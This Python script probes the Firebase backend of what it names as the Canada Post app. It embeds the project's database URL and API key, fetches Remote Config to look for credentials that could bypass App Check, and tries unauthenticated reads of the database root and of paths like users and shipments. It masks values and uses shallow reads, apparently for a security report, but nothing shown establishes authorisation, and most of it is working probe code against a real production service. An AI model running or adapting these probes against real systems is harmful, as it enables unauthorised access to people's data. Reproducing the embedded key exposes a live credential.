#!/usr/bin/env python3
"""
Quick Firebase Test - Canada Post App
======================================
Tests only Firebase Remote Config and Database access.
"""

import requests
import json
from datetime import datetime

# Firebase project identifiers used by every check below.
# NOTE(review): presumably copied from the app's client configuration - confirm
# provenance before reusing. The value named PROJECT_ID is all digits, so it
# looks like a project number rather than a string project id - confirm.
FIREBASE_DATABASE_URL = "https://canada-post-2dce9.firebaseio.com"
FIREBASE_API_KEY = "AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q"
PROJECT_ID = "741680414261"

# Run header: the timestamp and target are printed first so that captured
# output can be attributed to a specific run and database.
print(
    "=" * 80,
    "🔥 CANADA POST - FIREBASE SECURITY TEST",
    "=" * 80,
    f"Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}",
    f"Database: {FIREBASE_DATABASE_URL}",
    "=" * 80,
    "",
    sep="\n",
)

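# Test 1: Firebase Remote Config
# Sends one fetch request that carries only the client API key and reports
# whether the endpoint returns a config template. Entry values are masked
# before printing so the run log does not become a second copy of whatever
# the template holds; key names and value lengths are enough evidence.
print("[TEST 1] Firebase Remote Config")
print("-" * 80)


def _mask(value):
    """Return a redacted preview of *value*: a short prefix and its length."""
    text = value if isinstance(value, str) else json.dumps(value)
    # Short values get no prefix at all, otherwise the "preview" is the value.
    prefix = text[:4] if len(text) > 8 else ""
    return f"{prefix}… ({len(text)} chars)"


url = f"https://firebaseremoteconfig.googleapis.com/v1/projects/{PROJECT_ID}/namespaces/firebase:fetch"
body = {
    "appInstanceId": "test-instance",
    # Built from PROJECT_ID so the two identifiers cannot drift apart.
    "appId": f"1:{PROJECT_ID}:android:test",
    "languageCode": "en",
}

try:
    print("Testing Remote Config access...")
    # Let requests encode the key instead of splicing it into the URL by hand.
    response = requests.post(url, params={"key": FIREBASE_API_KEY}, json=body, timeout=10)

    if response.status_code == 200:
        data = response.json()
        # A 200 body is not guaranteed to be an object with an "entries" map.
        entries = data.get("entries") if isinstance(data, dict) else None
        if not isinstance(entries, dict):
            entries = None

        print("✅ SUCCESS - Remote Config is accessible!")
        print()
        print("📦 Configuration Data:")
        redacted = dict(data) if isinstance(data, dict) else data
        if entries is not None:
            redacted["entries"] = {name: _mask(val) for name, val in entries.items()}
        print(json.dumps(redacted, indent=2))
        print()

        if entries is not None:
            print("🔍 Found Configuration Keys:")
            for key in entries:
                print(f"   • {key}")

            # Check for sensitive keys
            if "APP_CHECK_FAILED_ID" in entries:
                failed_key = entries.get("APP_CHECK_FAILED_KEY")
                print()
                print("🚨 CRITICAL: Fallback credentials found!")
                print(f"   APP_CHECK_FAILED_ID: {_mask(entries['APP_CHECK_FAILED_ID'])}")
                print(f"   APP_CHECK_FAILED_KEY: {_mask(failed_key) if failed_key is not None else 'N/A'}")
                print()
                print("⚠️  IMPACT: These can be used to bypass App Check security!")
    else:
        print(f"❌ Failed - Status {response.status_code}")
        print(response.text)
except Exception as e:
    # Deliberately broad: a failure here must not stop the remaining checks.
    print(f"❌ Error: {e}")

print()
print()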

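# Test 2: Database Root Access (no auth)
# Asks the Realtime Database REST endpoint for the root node without any
# credential. A 200 with a non-null body means the rules allow public reads.
print("[TEST 2] Database Root Access (No Auth)")
print("-" * 80)

try:
    print("Testing database root access...")
    # shallow=true limits the reply to the top-level keys (nested objects come
    # back as `true`), which is enough to prove readability without pulling
    # the whole database - and any personal data in it - into this process.
    response = requests.get(
        f"{FIREBASE_DATABASE_URL}/.json",
        params={"shallow": "true"},
        timeout=10,
    )

    if response.status_code == 200:
        data = response.json()
        if data is not None:
            print("🔴 CRITICAL - Database is publicly readable!")
            print(f"Data type: {type(data).__name__}")
            if isinstance(data, dict):
                # Cap the listing so a very wide root does not flood the log.
                print(f"Keys found: {list(data)[:10]}")
            print()
            print("Sample data:")
            print(json.dumps(data, indent=2)[:500])
        else:
            # A JSON null is returned both for an empty node and for some
            # rule configurations, so the two cases cannot be told apart here.
            print("✅ Database is empty or protected")
    elif response.status_code == 401:
        print("✅ Protected - 401 Unauthorized (good)")
    else:
        print(f"Status: {response.status_code}")
except Exception as e:
    # Deliberately broad: a failure here must not stop the remaining checks.
    print(f"❌ Error: {e}")

print()
print()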

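# Test 3: Common paths
# Repeats the unauthenticated read against a few conventional node names,
# because rules can protect the root while leaving individual children open.
print("[TEST 3] Testing Common Paths")
print("-" * 80)

paths_to_test = ["users", "tracking", "packages", "shipments", "settings"]

for path in paths_to_test:
    try:
        # shallow=true returns only the child keys of the node, so confirming
        # exposure does not download the records stored underneath it.
        response = requests.get(
            f"{FIREBASE_DATABASE_URL}/{path}.json",
            params={"shallow": "true"},
            timeout=5,
        )
        if response.status_code == 200:
            if response.json() is not None:
                print(f"✅ /{path} - ACCESSIBLE")
            else:
                print(f"⚪ /{path} - Not found or empty")
        elif response.status_code == 401:
            print(f"🔒 /{path} - Protected (401)")
        else:
            # Report the code instead of folding every other status into
            # "not found", which would hide rate limiting or server errors.
            print(f"⚪ /{path} - Unexpected status {response.status_code}")
    except Exception as e:
        # `except Exception` rather than a bare `except`, so Ctrl-C and
        # SystemExit still stop the loop; the type is shown so that network
        # failures are not mistaken for a negative result.
        print(f"⚪ /{path} - Error ({type(e).__name__})")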

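# Closing banner and reviewer checklist.
# These bullets are static text printed on every run, so they are worded as
# pointers to the per-test output above rather than as findings: stating a
# result here would report it even when the corresponding test failed.
print()
print()
print("=" * 80)
print("TEST COMPLETE")
print("=" * 80)
print()
print("Summary:")
print("  • Remote Config: see TEST 1 output for whether entries were returned")
print("  • Check if database paths are accessible")
print("  • Document all findings for security report")
print()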
